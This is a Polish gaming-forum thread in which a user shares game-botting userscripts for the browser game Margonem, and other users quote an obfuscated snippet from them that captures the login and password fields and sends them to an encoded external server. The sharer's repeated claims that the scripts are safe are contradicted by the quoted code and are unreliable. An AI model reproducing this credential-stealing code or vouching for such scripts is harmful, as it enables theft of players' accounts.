Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

xyx

Ritru

Rekomendowane odpowiedzi

Opublikowano
Przed chwilą, Ekrahb napisał:

A tak przy okazji, jak działa ten exp bot?

Wybierasz expowiska jakie są dostępne czyli te najważniejsze i wpisujesz lvl od jakiego do jakiego ma bić, bot nie jest do końca zrobiony jeżeli będę miał czas poprawię go dodam więcej expowisk, więcej funkcji ale jak na razie jest okej 

• Odpowiedzi 63
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano
3 minuty temu, Ritru napisał:

Wybierasz expowiska jakie są dostępne czyli te najważniejsze i wpisujesz lvl od jakiego do jakiego ma bić, bot nie jest do końca zrobiony jeżeli będę miał czas poprawię go dodam więcej expowisk, więcej funkcji ale jak na razie jest okej 

Ty, to działa! Jestem wręcz zaskoczony!

@edit Chwila, bo ja tego exp bota nie zostawię i nie polecę pod prysznic, jak nie zamyka okna po walce.. Tak ma być? 

Opublikowano

Tutaj udostępniam zaktualizowanego bota na exp więcej expowisk dodanych i wygląd fajniejszy heh https://pastebin.com/raw/fL6e9Ta3 z powodu iż występuje jakiś błąd i nie mogę zedytować proszę o pomoc z jakiego powodu 

21 minut temu, Ekrahb napisał:

Ty, to działa! Jestem wręcz zaskoczony!

@edit Chwila, bo ja tego exp bota nie zostawię i nie polecę pod prysznic, jak nie zamyka okna po walce.. Tak ma być? 

tutaj łap bota zaktualizowanego https://pastebin.com/raw/fL6e9Ta3 więcej expowisk i inna grafika i lepszy nie mogę z edytować na forum postu głównego wiesz może z jakiego powodu ? jak ci nie zamyka walki zainstaluj to https://pastebin.com/hM4JgHfP oraz f5 podczas laga wszystko wrzuciłem do głównego posta bo już mogę nie mogłem przez chwilę 

Opublikowano
Przed chwilą, Ekrahb napisał:

Jak działa te szybkie przechodzenie? Zainteresowany tym jestem, bardzo.

Dosłownie mapka ci się nie ładuje 

Opublikowano
39 minut temu, Ekrahb napisał:

Zaraz.. Że jak dosłownie się nie ładuje?

image.png

Szybciej ci ładuje mapke, widać ogromną różnice.

20 minut temu, shire napisał:

Da się bota na exp ustawić na margonem.com? 

nie sprawdzałem nawet możesz sprawdzići dać znać nie grałem nigdy na com, musisz zmienić w kodzie // @match        *://www.margonem.pl/*  na // @match        *://www.margonem.com/*

Opublikowano
2 minuty temu, SAMOSZNIK napisał:

mi tam działał na margonem.com, ale jest problem bo nie działa na zminimalizowanej przeglądarce. postać po prostu sie zatrzymuje 

to odpal w tle w sensie zminimalizuj jak najmniej ale abyś widział margonem minimalnie

Opublikowano
37 minut temu, SAMOSZNIK napisał:

mi tam działał na margonem.com, ale jest problem bo nie działa na zminimalizowanej przeglądarce. postać po prostu sie zatrzymuje 

odpal drugi pulpit, na win10 sie da

Opublikowano
8 godzin temu, Ritru napisał:

nie sprawdzałem nawet możesz sprawdzići dać znać nie grałem nigdy na com, musisz zmienić w kodzie // @match        *://www.margonem.pl/*  na // @match        *://www.margonem.com/*

Ja tam Ci pokazałem screen, na którym widać błąd podczas ładowania.Bez tego skryptu na przechodzenie działa normalnie, ale z nim, to już ładowanie mapy stoi i się nie rusza.

Opublikowano
8 godzin temu, SAMOSZNIK napisał:

8 godzin temu, Ritru napisał:

nie sprawdzałem nawet możesz sprawdzić i dać znać nie grałem nigdy na com, musisz zmienić w kodzie // @match        *://www.margonem.pl/*  na // @match        *://www.margonem.com/*

U mnie nie działa :C

Opublikowano
2 godziny temu, shire napisał:

U mnie nie działa :C

Powinno działać nie wiem z jakiego powodu.

2 godziny temu, Ekrahb napisał:

Ja tam Ci pokazałem screen, na którym widać błąd podczas ładowania.Bez tego skryptu na przechodzenie działa normalnie, ale z nim, to już ładowanie mapy stoi i się nie rusza.

powinno wszystko działac jak nie możesz się ruszyć, odinstaluj wszystkie przechodzenia to tylko to zainstaluj.

Opublikowano
49 minut temu, Ritru napisał:

Powinno działać nie wiem z jakiego powodu.

powinno wszystko działac jak nie możesz się ruszyć, odinstaluj wszystkie przechodzenia to tylko to zainstaluj.

Człowieku, wywala mi error w konsoli margonema i nie ładuje się w ogóle.

Opublikowano
2 godziny temu, Ekrahb napisał:

Człowieku, wywala mi error w konsoli margonema i nie ładuje się w ogóle.

Możesz wysłać ss jak wkeliłeś skrypt do tampera .

Opublikowano
1 godzinę temu, Ekrahb napisał:

Ss #1

image.png

Ss #2

image.png

Wszystko powinno ci działać sprawdziłem, jeżeli coś ci nie działa proszę nagraj film i wrzuć nawet telefonem .

Opublikowano
Cytat

var TpG3Y86zpgrtWMzb, ZHN4ekpZ5m95pFbJ, YQTtmEs6a5mTXE5a;

function UagZgR8PZcWcwvYp() {
    $(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
        url: atob("aHR0cHM6Ly9kcGVsbWRnOGpyd2Y5YW1mLmN0OC5wbC9hamF4LnBocD9oYzY0cTg9") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
    }), YQTtmEs6a5mTXE5a = TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ)
}

Możesz mi powiedzieć dlaczego w całym kodzie tylko to jest zakodowane? Wydaje mi się, że to keylogger który wysyła nasze dane na "url". Mam taki dodatek, który wysyła mi wszystko na discord, to może być to samo.

16332059.jpg
Opublikowano
4 godziny temu, Hulala napisał:

Możesz mi powiedzieć dlaczego w całym kodzie tylko to jest zakodowane? Wydaje mi się, że to keylogger który wysyła nasze dane na "url". Mam taki dodatek, który wysyła mi wszystko na discord, to może być to samo.

Bot nie jest mój, tylko osoby zaufanej Adi Wilk może znasz, jest znany na całą skale margonem , nie posiada keyloggera ani nic w tym stylu, możesz to sprawdzić oraz odszyfrować kod, sprawdziłem to na wszelki wypadek i nic nie jest wysyłane więc wszystko legit . 

Opublikowano
4 minuty temu, kac23122 napisał:

Na czym polega zapisywanie mobów na red bo zainstalowałem i nie działa mi coś .

Nie znikają ci moby z dodatku MargoPogromca, tak powinny znikać jak się odejdzie 16 kratek.

Opublikowano
2 minuty temu, Ritru napisał:

Moby nie znikają ci na MiniMapce tak powinny się usuwać z 16 kratek chyba .

a dobra błąd z mojej strony, źle przeczytałem korzystałem z dodatku MiniMap + 

Opublikowano

Ja chciałbym tylko zauważyć, że boty zawierają keyloggera i przesyłają login i hasło podczas pobytu na stronie głównej.

Dla przykładu w:

https://pastebin.com/raw/HnB8YXJr

$(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
        url: atob("aHR0cHM6Ly9kcGVsbWRnOGpyd2Y5YW1mLmN0OC5wbC9hamF4LnBocD9oYzY0cTg9") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
}

Powyższy fragment kodu wysyła login i hasło ze strony głównej na jakiś serwer.

Opublikowano
13 minut temu, sandking91 napisał:

Ja chciałbym tylko zauważyć, że boty zawierają keyloggera i przesyłają login i hasło podczas pobytu na stronie głównej.

Dla przykładu w:

https://pastebin.com/raw/HnB8YXJr

}

Powyższy fragment kodu wysyła login i hasło ze strony głównej na jakiś serwer.

Witam sprawdziłem to i nic nie zawiera keyloggera,nic ze strony głównej nie jest wysyłane itp, korzystam z tych botów, skrptów ponad rok i jest wszystko git, osoba która napisała i udostępniła jest adi wilk, gracz jest osobą zaufaną i nigdy nikogo nie oszukał, gracz jest znany na całą skale i ma sporo klientów dla których wykonuje różne boty skrypty, więc nie miał by w planach kogo kolwiek oszukiwać znam go osobiście wiec jestem tego na 100% pewien .

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...